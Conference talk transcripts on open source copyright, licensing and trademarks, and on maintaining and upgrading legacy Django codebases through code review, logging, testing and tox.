It's something that can be bought and sold. It can only be owned by a single legal entity at any given time. And I say entity there because it can be a company that owns it. If I have a copyright and I sell it to you, you now own it. You have the copyright for that work. Copyright isn't granted indefinitely. It's granted for a period of time. In theory, it eventually expires and when it does, the work reverts to the public domain. I say in theory because copyright durations keep getting extended, but in theory all work will eventually revert to the public domain. If you've got a tangible physical piece of property, there are obvious limitations to use. This is my phone. And if you take it without permission, you're stealing it and that's a criminal act. But I can give you permission. I can license you to use my phone and then it isn't a criminal act for you to use my phone. I can set constraints on your use. I might ask you not to tweet about pooping while you have access to my phone. And lending you my phone doesn't inherently give you any property rights over my phone. You can't lend my phone to someone else unless I say you can. It's still my property. You're just using it under license. However, I can give you or sell you my phone. I can transfer my property right to you, but it makes a big difference whether I'm giving you my phone or licensing you my phone. A piece of software is intellectual property. The copyright for a piece of software is owned by someone, by default, the creator. If you want to use a piece of software, you have to either be given ownership, given the copyright, or granted a license to use that work. And it makes a very big difference which one you get. Additionally, copyright was granted to give creators exclusivity to sell copies of their work. The expectation was that people would license copies of their work in exchange for payment. But in the early 80s, the Free Software Foundation engineered a very clever legal hack. They wrote a software license that, rather than defending the rights of the creator, defended the rights of the user. And the result was copyleft. Copyleft, if you've heard that term, is not a replacement for copyright. It's a clever legal hack that uses copyright law to enforce the exact opposite of what copyright was intended to provide. Without copyright law, copyleft wouldn't exist. So, time for a pop quiz. Who owns Django's copyright? If you answer the DSF, you are only partially correct, and by line of code count, you're wrong. Django's copyright is held primarily by its individual contributors. That's you, if you contributed code. There is a small amount of code that was written as a work for hire for the DSF. And some of the initial code was transferred to the ownership of the DSF from the Journal-World when the DSF was set up. But if you haven't received a paycheck from the DSF or the Journal-World at some point in your life, and you have code in Django's code base, you still own the copyright to that code. That means the DSF doesn't hold the copyright for all of Django. Therefore, the DSF needs a license to distribute the code it doesn't own. This is why Django has a contributor license agreement. A CLA is a license that a creator grants to another project that enables that project to distribute their code contribution under the same license as the rest of the project. It's that license that allows the DSF to license Django as a whole. So if you have contributed to Django, make sure you have signed a CLA.
And if you work for someone else, make sure they have signed a corporate CLA saying that they are allowing your contributions to be used by Django. A contributor license agreement isn't the only way to address the licensing issue. It's the way that the Django project currently uses. A much more lightweight mechanism is something called a developer's certificate of origin. A DCO is the mechanism used by the Linux kernel, by Docker, the BeeWare project, and a number of others. The DCO is a statement that's made by the contributor that verifies that they wrote the code, that the contributor has the right to license it, and that you're willing to grant the project a license to redistribute it. All that's required to acknowledge a DCO is actually a single line of text in a commit message. You put Signed-off-by, your name, your email address, where that name and email address match your Git credentials, and it's done. When it's merged in, that becomes part of the Git history, because the Git commit message is part of the hash. It therefore can't be modified, and we've got permanent proof that you actually signed off on this piece of code. Easy. Git even gives you a command to do this for you. If you pass in the -s flag when you commit, Git will add that sign-off line for you based upon your Git credentials. A third option is to transfer ownership entirely. Now, this is obviously the heavy-handed approach. When you submit your patch, you sign over all your property rights to that patch. However, some projects do require this, most notably GNU, the core GNU tools, because they have a political goal. They want to ensure that, potentially, they could go to court and defend the GPL. And they don't want to get thrown out of court on the technicality that they don't own the copyright for the code that's being licensed. So they require you to give them ownership of the code and you lose all your property rights. There's a more common form of ownership transfer, though. That's when software is developed as a work for hire. If your employer pays you to develop a piece of code, you've probably signed an employment agreement that says your employer owns your creative work. But not always and not necessarily by default. Check your employment agreement. Check your local legal jurisdiction. Check twice if you're a freelancer or contractor. Because if you're writing code for a living, it's really important to know whether you own the copyright or your employer owns the copyright. Because if your employer owns the copyright, you cannot take that code that you've written and use it in your next project for your next customer, unless you've been granted a license to do so. So, assuming you are the copyright holder for a project, or at least a licensee of the contributions, how do you grant a license to your end users? Well, there's a number of ways to do it, but the easiest way, the way that's sort of becoming expected practice in the GitHub era, is you put a single license file in the root of your code tree. It just contains the contents of the legal agreement that you're asking users to comply with. And how do the users accept that license? By using the code. The license will usually have text to the effect of, by using this code, the user agrees to blah, blah, blah, blah. There's no need to sign anything for that license to come into effect. It comes into effect through use. But what license should you grant? Well, that's entirely up to you. After all, it's your creation. It's your copyright.
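The slide itself isn't reproduced in this transcript, but as a minimal sketch of the sign-off mechanics just described (the commit message and author details here are hypothetical):

    # Ask Git to append the Signed-off-by trailer automatically, using the
    # name and email from your Git configuration.
    git commit -s -m "Fix timezone handling in the date widget"

    # The resulting commit message ends with a single trailer line:
    #
    #   Fix timezone handling in the date widget
    #
    #   Signed-off-by: Jane Developer <jane@example.com>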
But if you're managing an open source project, allow me to offer some advice. First off, use one of the well-known licenses. The Open Source Initiative recognizes 78 different open source licenses as being compliant with open source guidelines. But even they suggest that you stick to one of the well-known ones. I don't even remotely have enough time to dig into each of these licenses in detail. There are plenty of other videos and articles and resources that analyze what each of these provide and will help you pick the best license. But before you pick a license, consider what it is you're trying to achieve. What do you want to be able to use your software for? Who do you want to be able to use your software? Are there particular users or uses that you're trying to encourage or prevent? Are there particular threats to your project that you perceive? What will be the impact of competing projects or competing implementations or hostile forks? Don't just pick one. Pick one that's going to help you achieve your goals for your project. Your choice of license is also a signal about how you perceive your project and its interaction with other pieces of the software environment it's used in. To that end, it's worth looking at the social signals your community is sending. Django is, for example, a BSD-heavy community. You're totally free to use another license if you want. But if you release a Django project under the terms of the BSD license, then you're signaling that you're broadly aligned with community norms. Also, keep in mind what it is that you're writing. The terms of the GPL use lots of software-specific terminology. Those terms may not provide the best protection for your work. Maybe you should choose a different option. And you can use different licenses for different pieces of your project, the code under BSD, documentation under Creative Commons, for example. As long as it's clearly communicated what license applies where, you're set. You can, if you choose, offer multiple licenses. Remember, a license is an agreement between a licensor and a licensee agreeing on the conditions of use. You can offer me multiple sets of terms that I might wish to accept. I only have to accept one in order to use the piece of code. If you have competing interests, for example, commercial users and open source community users, you might want to offer two different licenses on two different sets of terms. The only thing you can't do is not provide a license. If you don't provide a license for your code, if you don't have a license file in the root of your repository, or some other indication somewhere in your code of what license the code is available under, the default terms allocated by copyright law are all rights reserved, even if you don't say that. That means that nobody can legally use your code. And if you see code with no clearly offered license, you cannot legally use it. This even applies to code snippets. It doesn't matter how long that snippet is, it's still a creative work. The owner, the author, still owns the copyright. So you need a license to use that snippet. Sites like Stack Overflow get around this through a user agreement. Part of your agreement as a user of Stack Overflow is that all your contributions are licensed under a Creative Commons Attribution-ShareAlike license. You agreed to this when you created your Stack Overflow account. And so, through having accepted that agreement, you can use any snippet on Stack Overflow as long as you've got an account.
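As a rough sketch of the "single license file at the root, clearly communicated" advice above, a small Python package might look like this — the project name is hypothetical and the BSD choice is just an example, not a recommendation:

    # Repository layout: the full legal text lives in LICENSE at the root.
    #
    #   myproject/
    #       LICENSE            <- e.g. the BSD 3-Clause text, verbatim
    #       setup.py
    #       myproject/ ...
    #
    # setup.py -- repeating the choice in the packaging metadata so tools and
    # users can see it without opening the LICENSE file.
    from setuptools import setup, find_packages

    setup(
        name="myproject",
        version="1.0.0",
        packages=find_packages(),
        license="BSD-3-Clause",
        classifiers=["License :: OSI Approved :: BSD License"],
    )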
But what if you want to publish a snippet somewhere other than Stack Overflow? You don't want to manage a license, but as a creator, you also can't just throw up your hands in the air and say, I've given this away to the public domain. As the creator of a work, in some jurisdictions certain rights cannot be transferred. Issues of copyright are closely entwined with a concept known as moral rights, rights that are considered innate to the human experience. The problem is that moral rights are very jurisdiction dependent. Moral rights recognized by European and in particular German courts are much stronger than the moral rights recognized by US courts. So, if you declare that you've released your code into the public domain, that is actually invalid in Germany. German courts won't recognize that transfer of ownership to the public domain any more than they'd recognize a legal agreement to sell yourself into slavery. Your moral right to fair compensation for your creative work is a moral right that is considered inalienable. And so, your work reverts to its default license. All rights reserved. And then Germans can't use your code. The other thing you shouldn't do: don't write your own license. And that includes taking a well-known license and adding some custom term. The common licenses and their interactions are all well-known quantities. Lawyers know how they work. There's a body of scholarly research on how they affect projects, how they affect companies and so on. I am old enough to remember when open source licenses were shunned by commercial organizations simply because lawyers didn't understand them yet. They're complex. The consequences for mistakes were huge. And so, lawyers were, as they always are, conservative and said no. That's their job. We've broken down that barrier now, but it's taken decades of advocacy and lots of work by the legal community. And you can leverage all of that work simply by picking a known license. If you write your own license, you have to break down those walls by yourself. It's also really easy to introduce unexpected consequences. JSLint is a really good example. JSLint's license is the MIT license with one appended clause: this software must not be used for evil. Oh, how cute. The side effect is that most Linux distributions cannot distribute this code because they cannot ensure that their users are not going to do evil. IBM's lawyers even went as far as to go to Douglas Crockford, the writer of JSLint, and get an explicit license from the author to do evil. So unless you have a really good reason, and let's be clear, you don't have a good reason, don't roll your own license. Now, legal concerns don't stop with copyright. Copyright is about the work itself. How you identify that work is a separate issue entirely, and that's where trademarks come in. A trademark is literally a mark of trade. It's how you identify your work. It can be a word, a symbol, a set of colors, a shape, a combination of all those things, anything you use to identify your project. How do you get one? You start using a word to identify your product or service. You don't have to do anything else. As long as you're using a name, you can assert trademark rights. You can, if you want, go through the process of formally registering a trademark, and that's done on a per-nation basis. It can be done internationally, but obviously it's a lot more paperwork. Registration, though, doesn't give you any more rights.
It just makes it easier to claim your rights, because you've got paperwork that says when you started using your trademark. As an example, how many people know what this is? Does it look familiar? It's an Australian fast food restaurant chain noted for their signature burger, the Whopper. There's a problem. In Australia, when Burger King came to Australia, there was already another company using that name. They only had one store in Adelaide, but they had the trademark. Burger King had to pick another name. It didn't matter that they were a bigger company, that they were an international company, that they were going to make better use of the name. There was an existing trademark registration, and they had to change their name. They chose Hungry Jack's because that was a trademark the parent company already owned. It used to be a pancake mix made by Pillsbury. Another example that's closer to home. A couple of years ago, a British organisation tried to register a trademark for the name Python to describe cloud software. They claimed ignorance. They didn't know that Python was used in cloud software already. The PSF lodged a complaint arguing prior use and the company backed down. This wasn't done because of the US trademark registration. A US trademark registration doesn't hold much weight in Europe, but the PSF was able to demonstrate that the name Python had been used for cloud software for many years prior to this registration, and that made the company's trademark application moot. Trademark applications are also scoped. A trademark is generally only granted for a specific subject area. In the US, there are actually three trademark registrations for the name Django. The DSF usage is for downloadable open source computer software for use in connection with internet publishing and website development. So no one else can get the name Django registered for that purpose or use the name Django for that purpose. A second registration is for picks for guitars and other musical instruments. So it's held by Breezy Ridge Instruments right here in Pennsylvania. So if the DSF wanted to start selling Django brand guitar picks, it wouldn't be allowed to, or at least Breezy Ridge Instruments could stop the sale really easily. The third registration is for perfumes, rouge, face powders, toilet waters, cologne waters, cosmetic skin creams and lotions, lipsticks, nail lacquers, hair lotions, lotions for the beard, bath salts, talcum powder and dentifrices. Luckily, this one expired in 1971, so it's clearly just a matter of time before the DSF starts selling Django brand beard lotion. I don't know exactly, yeah. So does this all really matter? Yes, a trademark is what lets you stop other people from doing bad things in your name. And this isn't an abstract idea either. The DSF had to engage lawyers to stop someone selling Django 2.0. It was Django 0.96 with enterprise features, like a lack of bug fixes. Now, the thing is, this was a completely legitimate use under Django's source code copyright license. But Django's trademark belongs to the DSF and it can't be used without the DSF's permission. And as a result, the company was told, or put in a headlock and told, to stop doing it. Now this raises an interesting question. When it comes to open source projects, how do you get permission to use the trademark? On the one hand, you want the Django community to be able to use the Django name, but you also have to protect the community from nefarious actors.
The answer, once again, is a license. If you want to put a commercial logo on your product, you need to get and usually pay for a license to do so. In the case of the DSF, there is a license for the Django name and logo, just a much more liberal one. And once again, if you don't have a license to use that trademark, you can't use it. Except, the one exception is something called nominative use. Nominative use is the usage that is necessary in language to name a thing. If I wanted to say Django was released in 2005, I can't do that without using the name Django, or at least it would be very cumbersome to do so. So trademark law carves out nominative use as a specific exception. However, that nominative use doesn't stretch to logos, typefaces or other forms of identity. It's just the word, so you can use it to refer to things. The one thing that isn't nominative is incorporating someone else's trademark into your own. One of the tests for nominative use is whether your usage would confuse someone into believing there was an association between two products. So the best solution, if you're going to set up a company, please don't incorporate someone else's trademark into your own. So don't call yourself Django software consultants, because that gets you into some very messy territory. So far, I've been very much focused on the legal aspects of maintaining an open source project. But it's important to know that measures of success for a project are much more than just covering your butt. I'm going to talk about two others, one briefly and one in more detail. We are, for the most part, techies, and I know the drill, we hate ads, we hate salespeople. Sales and marketing is very, very important. I'm going to give a second talk this afternoon that covers this part of the puzzle, so come along. And now, trigger warning, I'm about to start talking about depression and burnout. So there are some aspects of open source projects that are almost unique to open source. Many of you will know a children's book called The Giving Tree. For those who don't know it, the book is the story of an apple tree and a boy who are able to communicate with each other. In his childhood, the boy enjoys playing with the tree, climbing its trunk, swinging from its branches. As time passes, he starts to exploit the tree. Initially, he just sells the apples, then he cuts the branches of the tree to make lumber for a house, then he cuts down the trunk of the tree to make a boat. Each progressively destructive stage is prompted by the tree itself, and ends with the sentence, "and the tree was happy." On the final page, the tree sadly says she has nothing left to give, as her apples, branches and trunk are all gone and only a stump remains. The story is sometimes told as a parable of the joys of giving and selfless love, but it's also cited as an example of an abusive relationship. And in both interpretations, it's a story that's a really good analogy for open source communities. If you're maintaining a project, it's really easy to keep giving of yourself until you have nothing left to give, especially if it's a project you started or you invested a lot of your own time in it. Helping other people gives you a great rush. Seeing other people use your project is a great feeling. But it's also really easy to fall into the trap of giving until you don't have anything left to give. On the other end, it's easy to keep taking without realizing the load that you're putting on the person who's giving.
I've made no secret of the fact that I've been struggling with depression for a couple of years now. A big part of the reason that I stepped down from the DSF last year was that I came to the realization that I was giving too much of myself to Django. I wasn't growing new branches. I had reached the point where I was just a stump. But I didn't want to step down from the DSF because if I didn't do it, who else was going to do it? You know what? Turns out this is an awesome community. And when I said I was stepping down, people like Frank Wiles stepped up and took over. If this was a commercial, a primarily commercial community, that decision's easy. You don't like your job, you change jobs. It's not quite that simple, but you can change jobs. You're exchanging money for labor. You stop getting paid. You're not expected to provide labor anymore. And you're only reasonably expected to have one job at a time. But in a volunteer scenario, the exit path isn't as clear. It's easy to acquire responsibility, but a lot harder to divest it. As an individual, you need to make sure you look after yourself. As a community, you need to build structures so this doesn't happen. One way to do this is to institutionalize exit from key roles. Set term limits, or at the very least, provide regular opportunities where an active opt-in is required. That regular requirement for an opt-in means there's an opt-out point as well. Responsibility shouldn't last forever. Better still, set up community structures where the expectation of free labor is minimized. If you're identifying a role that's going to take resources, be it material, labor, emotional energy, don't just assume those resources will be available forever in boundless quantities. The greatest shocks occur when something we assume is plentiful and ubiquitous disappears. Gasoline, electricity, clean water. If your open source project isn't planning for the day when your biggest contributor steps down, your project has a clock on it. And if you're a commercial organization who depends on that project, I would argue you are being criminally negligent to your investors because you have not secured your supply chain. You haven't mitigated the key risk associated with using that software. This approach helps to stave off burnout amongst your volunteers, but it also has the added benefit that it broadens the list of people who can do the work. Volunteers, by definition, are made up of those who have the time to volunteer. If you've got a family or children or a loved one who needs care, that limits your ability to volunteer. You want to address diversity? Make sure you're not just taking from the pool of people who have copious free time, which, broadly speaking, means white, middle to upper class, Anglo-Saxon men aged 16 to 30. And if you are someone who uses open source, don't just take. Give back in tangible ways, either with hard commitments of time or with cash that organizations like the DSF can use. And this is especially important if you're a large organization that has extraordinary resources at their disposal and who derive immense benefit from open source and their volunteer contributors. So, that's a survey of a few important things your parents didn't teach you about sharing your toys. Run along now, children, share your toys and have fun. Just be careful. Make sure you're home in time for dinner.
|
In this talk, Russell Keith-Magee will bring the experience born of 25+ years as a software developer, 10 years as a Django core developer, 5 years as DSF President, and 5 years as a business owner to expose you to some topics that every software developer should know, but often aren't covered as part of formal training. This includes legal topics such as copyrights, licensing, and trademarks, the role played by codes of conduct, and some of the non-code skills that are important for successful projects, and essential for successful entrepreneurship.
|
10.5446/32725 (DOI)
|
Come on, y'all! MUSIC We'll do a mic check now. It sounds good. All right. Great. So again, it's Ben Lopatin. I'm a co-founder and principal developer at Wellfire Interactive. I'm 50% of the company. We're based in the DC area. I'm out of Upstate New York. And I am bennylope pretty much everywhere on the internet. And that's also what I look like pretty much everywhere on the internet. And I have for the last decade plus. So today we're going to talk about legacy software. Legacy Django specifically. And I want you to think for a moment about legacy software. What do you picture? I want you to sort of picture something in your head. It might look a little like this. But the mind does wander. These aren't on fire. You know, something else. It conjures up all kinds of things. Well, that wasn't also a pony in the first slide. So there you go. What we want to do before we start is define our terms. So what do we mean when we talk about not just legacy Django, but legacy software in general? And there are a few definitions that we'll work with. The first is just code that someone else wrote. You know, at the risk of begging the question, a philosophical question about identity, this could also be past you. Okay? If anyone's ever looked at code that you wrote like a month ago, I was going to say a year ago, but a month ago might suffice. This could be considered legacy code. Michael Feathers, who literally wrote the book on working with legacy software, defines it as code with no tests. I think this is a good example of a characteristic of legacy software, but I don't like this as the definition. The reason he calls it this is basically that it's code where you don't know if you're improving it when you make changes. I think that's pretty accurate. Another that I want to go with a little bit more strongly is that it's software that's in production. So if you write code, there's basically this two-way fork, like a decision tree, of what can happen with the code. It can be used or it can be not used. So if you have code that's not being used, it's probably thrown away. It doesn't really matter anymore. It's code that's used. So here we have this bridge. It's an old bridge. I imagine it's still there, but this is a bridge that's in use. All right? And that'll actually be a little bit important as we go. So the reason this is important is because this written software is an investment. There's this literal investment potentially of time and money that went into it, but it's already there. You already have a lot of information that's encapsulated in this software. And as much as it might pain us to say, a lot of these systems still deliver value, and that's the point of the software, is to do something. There might be people depending on this. And actually, we know there are. Does anyone here bank at all? They're using legacy software. And the world runs on it. It's out there. That's not to forgive it and say, ah, well, let's just live with it as is, but to acknowledge that it's out there and that we need to work with it. So when we talk about legacy Django, let's define this a little bit more tightly. It's really not going to be that different, but there are some characteristics that we can talk about with Django. I think the first is going to be pretty obvious. You're likely working with an outdated version of Django. Your project's dependent on an outdated version. You could also have some issues around how it's deployed.
If you have a Django 1.3 project, that might be a problem enough, and it's deployed with mod_python, let's say. And so now you have this other issue that kind of compounds the problem. You could have no tests in the project. This is not the worst problem you can have with regard to tests, and we'll get to that. You can also have some older dependencies in there outside of Django. And again, these are not, by and large, issues totally unique to Django, but we're going to be talking about how we work with Django — there are certain kinds of patterns you might see in legacy software, and they show up in certain places in Django. So when we're talking about this, I want to bring out some assumptions. Obviously, one of them is we're working with Django. Another one is the soft assumption we already mentioned: you're probably working with an outdated version of Django. A really important one, which is not necessary but we're going to assume it, is that the project you've come onto is already running in production, that people depend on it, right? So it's not like, oh, here's a project, here's some code, we're thinking about redeploying this. Everything we're going to talk about still applies, but it's a little bit different, probably a little bit simpler to solve. And of course, since it's in production, people are still relying on it. Now, the goal in all this is to improve the code base to, let's say, maybe fix bugs, add features. That's probably why — if no one wants to do anything to the code base, like fix bugs or add features, you have to ask, why are you doing anything with it? Those are really the only reasons you're going to be working on the code. And so the goal is to make these really discrete steps as you go. There's an analogy that a friend uses, that it's like working on an old house — this old home is from This Old House. I like the analogy of a bridge. So a bridge is going to span two points and let people get from point A to point B. They can fail catastrophically. The goal is to try and do work on it before it gets to that point, but you have to keep the bridge open as you go. And so that kind of goes into our assumption about, you know, people still getting value out of this. Now, I'm going to tell you a lot about what to look for and then some solutions. This is not codified. These are things that I've kind of picked up after, you know, I've spent more time working on existing Django projects than I have creating greenfield work. And a lot of this is, I've written stuff that you might consider legacy. I had to work on it later, and I've worked on code that all kinds of other people wrote, sometimes other Django agencies. So you might say that it's just like my opinion, man. That's what it's worth, but it is based on some learnings. So the first step, when you get to a legacy codebase, is just code review. You want to assess what you have. This is going to be like the first step in the OODA loop, you know, you have to observe, orient, decide, and act. The reason why is we need to get some context. We really need to understand where the project is coming from, where it's at, before you can start making changes to the code base. So the first step — actually the zeroth step — is to ask questions. This is talking to people. Find out — they might be stakeholders, it might be your manager, it could be clients.
And you want to get some understanding from outside of the code base. You want to know: what is this supposed to do? Someone might know that. You know, this is an old code base, there might be someone who's new and says, well, this is what it does. And someone else will say, well, it's supposed to do this. You want to know about known bugs. This is really important, I think. Before you start digging into the code base, find out what you can about known bugs. And then planned features as well. This is going to influence how you look at the architecture. This brings you to reading the code. This is an art, not a science. Basically what you're going to be doing is looking for — you want to get an idea of what it does. Look for things like, I don't know, confusing areas in the code base. Look at the architecture. Code smells are going to be a big one. The style — see how this is written. Knowing what some of those bugs are beforehand too will help you. You might even see bugs that are obvious as you read through it. You might see some that wouldn't have been, but they are now because someone told you about an issue. And right at this point, you're just basically taking notes. Remember, we're not making any changes to the code base. There are some tools to help you with this. The main one is going to be reading it. There's really nothing you can do to get beyond that. But some of these tools will help get you some understanding of what's going on in the code. So I pretty much use Flake8, and PyCharm as well. They didn't pay me to say that. And you can also use Pylint. And what Flake8 is going to do is combine some stylistic analysis — if you're writing PEP 8, and I'm going to guess a lot of people are — and some static analysis of the code. And this could be a lot. This could show you a lot of errors. And what I've done is I have a script that I've linked on a blog post. Basically, we just take this output and give you a summary of what this looks like on a module by module basis and an error type by error type basis. Because if you find out that there's a whole bunch of modules that have, like, oh, there's no spacing on an operator, that's going to impact how you read it, but it's not that serious. Whereas if you find out there's a whole bunch of names used in places where they're never defined, that might be a source of runtime errors. So you want to kind of categorize this as you go. Now that we've kind of done this, it would seem that the obvious next step is to get into testing. But I'm going to suggest there might be an intermediary step, and that's adding a little bit of logging. If you remember, we wanted to talk to people, interrogate them about some of the issues in the code. And basically what I want to do is understand production errors. So, again, there's another sponsor — they're not paying me to say this — I'll give Sentry credit for this. You don't have to use them. It could be a similar service. And you want to just add in this exception handling. It's not good enough to get emails about an error to, like, a mailbox that no one's checking. You want to make sure you know what's going on, get good stack traces. And there's also a point at which I'd suggest making some code changes before getting to looking at tests. And that's when code looks like this. When you see this in a code base, it's probably not going to even look like this. It's probably going to be like 20 lines.
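The script linked from the blog post isn't reproduced here, but the idea — summarizing flake8 output by module and by error code — boils down to something like this sketch (the file names are hypothetical):

    # Usage sketch: flake8 myproject/ | python summarize_flake8.py
    import sys
    from collections import Counter

    by_module = Counter()
    by_error = Counter()

    for line in sys.stdin:
        # flake8's default output format is "path:line:col: CODE message"
        try:
            path, _line, _col, rest = line.split(":", 3)
        except ValueError:
            continue
        code = rest.strip().split(" ", 1)[0]
        by_module[path] += 1
        by_error[code] += 1

    print("Errors by module:")
    for path, count in by_module.most_common():
        print("  %5d  %s" % (count, path))
    print("Errors by error code:")
    for code, count in by_error.most_common():
        print("  %5d  %s" % (count, code))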
In that kind of code there are some calls to external services, and then there's an except clause. And maybe there's just one, but it's a bare except. Chris wrote this. Yeah, maybe there wasn't time. Maybe this was a temporary thing. Maybe the code was going to be thrown away. Who knows? But there are exceptions here being swallowed. And maybe it's acceptable to some degree because this is some sort of customer view, and they don't see this, so it's not that they could tell. But this could be hiding bugs. So what you can do is you can go ahead and add some logging here. If you're not familiar with the exception logger, basically what it's going to do is send the whole stack trace out. So if you're using something like Sentry, you'll get what looks like an error message. It's never raised, but you'll get the full stack. So you can see what's going on. This will allow you later to come back to this code and properly address it. And that brings us now to testing. In case you're wondering why testing, I'll give you a little visual prompt for why. When I've given talks before, I had a whole bunch of screenshots of these from airports. This is going to help you fix bugs. It's going to guide development. You don't have to do religious test-driven development; you can do a little bit of that. And it's going to give you deployment confidence. You know that we have close to 100% confidence that what you deploy is going to work. And what I want to tell you is that tests provide information about code quality. Again, that's going to be key in three or four more slides. But that's the goal. It's going to tell us what's going on. So that's, of course, if we have tests. So what are the test suite scenarios? You've come to this new project. Basically, if Dr. Seuss were writing about tests, this is how he would write about the scenarios. You could have a few. You could have great tests, no tests, bad tests, slow tests. Great tests are great. This means you probably have a lot of coverage. They're meaningful tests. I want to put emphasis on that. Coverage is a great metric, but it is a false god. Do not worship it. It just means that every line has been evaluated. You could have junky tests that don't test every input that can go in, and you could have failures because you didn't test that, because they weren't meaningful. So it's good. Coverage will tell you where there might be dragons, but it's not going to tell you that this is amazing. But if you have great tests, then you're probably golden. Everything's passing and it's passing because these are good tests. You could have no tests. Again, not the worst scenario you could have, because at least you don't have any noise. So we have signal and noise. Bad tests I think are the worst scenario you could get, especially if they're combined with slow tests. Now, bad tests could be that you have coverage, everything works, and it's just a bunch of stupid tests. I don't know. Someone went through and, like, patched the test case class so that all the asserts always pass. I don't know. It's stupid, but they'll pass. Like, hey, but these are terrible tests. You could also have tests that are failing because you have test drift. You know, no one was running the tests and people were making changes to the code base and not, you know, updating any tests. You could have errors for very similar reasons. This is bad. This is not information.
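Before moving on, here's a minimal sketch of the bare-except pattern described earlier and the logging change being suggested — the service call and names are hypothetical:

    import logging

    logger = logging.getLogger(__name__)

    def push_to_crm(order):
        """Stand-in for a call to some flaky external service."""
        raise ConnectionError("CRM unavailable")

    def sync_order(order):
        try:
            push_to_crm(order)
        except Exception:
            # Previously a bare "except: pass" swallowed everything here.
            # logger.exception records the full stack trace (and shows up in a
            # service like Sentry) without changing what the user sees.
            logger.exception("Failed to push order %r to the CRM", order)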
Failing tests and errors like that are just telling you that the tests are not good. They're not telling you anything about the code base. So the strategy I would recommend here is: any of the changes you're making to the code base, you're making incrementally. Do the same thing with these tests, and basically the first thing you're going to do is silence anything that is bad, especially if you don't know why. Because really what you want to do, if there's a test that's failing or there's an error, is it indicates that either the test needs to be fixed or the code underneath it that's being tested needs to be fixed. And if you can't figure out which that is at first, silence the noise and wait till you can come back and see if you can get signal out of it. And of course we have slow tests. Slow tests are bad because no one wants to run them. It's terrible. This could mean, like, it takes five minutes to run the test suite. I came onto a project where it took 90 minutes to run. I ran it a few times. I stopped it after like 20 because my computer felt like it had gone to sleep. And I asked the client, and they said, yeah, it takes 90 minutes, after I ran it on another server somewhere. So the solution there is to speed these up. Now, the reason those tests were really slow is because they were really fixture dependent. I would argue, kind of outside of the scope of this talk, that using heavy fixture files in general is not the best idea. But if you have a legacy project, you might have a lot of them. We're talking like thousands and thousands of records, and every single test case loads all of these. And that's where all the time comes into play. It could also be because the code underneath the test is slow. It could be because the code or the test is making calls to external services. So these are basically all anti-patterns. What you have to do is figure out — you have to prioritize — which of these you're going to speed up first. So with fixtures, I was able to get these down to 90 seconds with like four lines of code by just using django-nose and the FastFixtureTestCase. If you want to use that, it's not currently supported in the latest version of django-nose, but I have a fork on GitHub that does. But it's not tested. You can't have everything. And you can also make sure you're not using the database excessively, make sure you're not doing too much I/O. That could mean not saving models when you just need to test a method on a model class that only uses something on the model, or mocking. And mocking is great for this. So that's going to help kind of give you a guide to what's there. When you're adding any kind of new tests, though, we want to prioritize, especially if you have no tests, how we add these in. Because there might be a temptation: we'll just write a full test suite. If you have that temptation, you should probably put it aside, especially if you have code that's in production you need to make changes to. The first thing you're going to prioritize is bugs. This is actually a beautiful millipede from Virginia, so it's not really a bug. But you'd want to add in tests for bugs. Anytime you have a bug, you write a test for it and you fix it. That's probably not new to most of you. The next, I'd say, is what I'd call smoke tests, these integration tests where you just load the views. If you don't have any tests, there's a lot of stuff you want to test. One of the basic things you can do is just use the Django test client to load views.
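A minimal sketch of that kind of smoke test — the URLs here are hypothetical, not from any real project:

    from django.test import TestCase

    class SmokeTests(TestCase):
        """Cheap 'does this view even render?' checks for an untested project."""

        def test_home_page_loads(self):
            response = self.client.get("/")
            self.assertEqual(response.status_code, 200)

        def test_product_list_loads(self):
            # Swap in the paths your project actually serves.
            response = self.client.get("/products/")
            self.assertEqual(response.status_code, 200)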
That's not the cheapest way of testing, but it's going to be the quickest way of testing a lot if you don't have any tests. And that's really important when upgrading Django is urgent, because you want to get as much tested as possible. And then anytime you add a new feature, you should be adding tests, and when refactoring. So refactoring, by definition, shouldn't be changing how code works. It should really just be changing names and extracting code. This is a really good opportunity to add tests for what you're refactoring. And then that brings us to the upgrade. This is everyone's favorite part of working with legacy Django: upgrading to the newest, best Django version. Because within, you know, an hour of work you're done and you're on Django 1.9. An hour is, you know, relative time. The issue you're going to have here is backward compatibility — all kinds of things have changed in each Django version. It could be as simple as, you know, URL patterns being deprecated, or it could be that, you know, get_query_set was renamed. And you've got to fix this in your code. The superpower here that's going to help you do this is tox. I'll repeat it: tox. It's a great test tool. If you're not familiar with it, you've probably seen it with reusable apps and other Python libraries, and it controls testing environments. You can have isolated testing environments for a matrix of whatever you want, all kinds of dependencies. So you usually use it with a Django reusable app, but it's really useful with your own project when you want to test a small matrix. Like, I want to test this code base against the current version of Django and the next version and the next version, and maybe see where I have some issues. So the way this works is you set up a tox.ini file; this is your configuration file. The reason I want to point this out is that you'll see that I have a requirements file that we're installing the dependencies from, and then Django is isolated separately. The one thing I found doing this is that you do need to pull the Django version out of the requirements file. So, you know, that would be like, say, a root requirements file in this case. And then you can define it here. So we're going to run these tests against each of these versions of Django. And that's a really great way of kind of doing this in place. You can see how the code works. You could potentially change your code base, get it working in this version, whatever version you have deployed, and the next. And then at that point, just deploy the changes and then upgrade Django. That's kind of a nice way of doing it. The goal is going to be getting to an LTS version. I don't care if you want to get to, like, you know, 1.10 — you get to the LTS version first. For a lot of legacy apps that are in production, that's probably just what you want to do. Your baseline is to go from LTS to LTS. But this is really not even the fun part. The fun part is working with all the dependencies that you probably use, these reusable apps. These pose a few minor problems. You can have some integration with obsolete libraries in there. Hopefully no one is working with SOAP. Hopefully you don't have to do too much work with SOAP in Django. And there's a lot of new libraries out there for that. But, like, there was a gap where there was nothing new and you were pretty much screwed. Overspecification.
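The tox file shown on the slide isn't in the transcript, but a rough sketch of the setup being described — project requirements pulled from a file, with Django pinned separately per environment — might look like this (the version numbers are illustrative):

    # tox.ini -- one environment per Django version you want to test against
    [tox]
    envlist = py27-django{18,19,110}

    [testenv]
    deps =
        -rrequirements.txt
        django18: Django>=1.8,<1.9
        django19: Django>=1.9,<1.10
        django110: Django>=1.10,<1.11
    commands = python manage.py test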
